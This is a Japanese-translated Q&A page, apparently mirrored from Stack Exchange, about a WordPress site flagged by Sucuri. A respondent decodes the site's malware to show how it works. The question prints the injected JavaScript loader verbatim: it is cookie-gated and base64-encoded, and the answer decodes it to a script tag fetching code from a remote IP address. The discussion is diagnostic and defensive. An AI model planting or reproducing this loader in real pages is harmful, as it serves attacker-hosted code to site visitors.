web-dev-qa-db-ja.com

Sucuriはwordpressでマルウェアを検出しますが、悪意のあるコードを見つけることができません

昨日、一部のwordpress Webサイトを確認するように依頼するレポートを受け取りました。その人物のアンチウイルスがそのWebをブロックしたためです。

私はSucuri Site Checkを実行し、実際にマルウェアを検出しました。

「既知のJavascriptマルウェア:malware.injection?39」

<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

ウェブを無効にして、すべてのソースコードをダウンロードしました。しかし、悪意のあるコードを探そうとすると...何も見つかりません。すべてのファイルを検索しましたが、何も検出されません。

私に何ができる?任意の助けいただければ幸いです。

malwarejavascriptapacheinjectionwordpress
9
amagali

問題のマルウェアは他の場所にホストされており、(おそらく)クロスサイトスクリプティング(XSS)によって追加されています。 「var src」の部分を見ると、Base64でエンコードされたテキストの長い文字列が表示されます。

ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=

デコードすると、次のようになります。

document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%31%39%33%2E%32%33%38%2E%34%36%2E%35%37%2F%6D%52%50%50%7A%43%22%3E%3C%2F%73%63%72%69%70%74%3E'));

document.writeは、指定されたコードをDOMに追加します。 「unescape」内の部分をURLデコードすると、次のスクリプトタグが生成されます(分割するためにスペースが追加されます)。

<script src="http://193.238.46.57/            mRPPzC"></script>

そのため、マルウェアはそのURL(それが何であれ)でホストされている可能性が高く、document.writeコマンドを介してページに挿入されています。

私がこれをどのようにしたかについてのクイックガイド

  1. Notepad ++をインストールします。
  2. Mimeツールプラグインがインストールされていることを確認します(デフォルトである可能性がありますか?)
  3. Base64でエンコードされた文字列を新しいファイルにコピーし、テキストを選択します。
  4. [プラグイン]で[MIMEツール]-> [Base 64デコード]を選択します
  5. Unescape内のパーツをコピーして新しい行に貼り付けます
  6. 新しい行を選択し、[プラグイン]-> [MIMEツール]-> [URLデコード]を選択します。
15
Philip Rowlands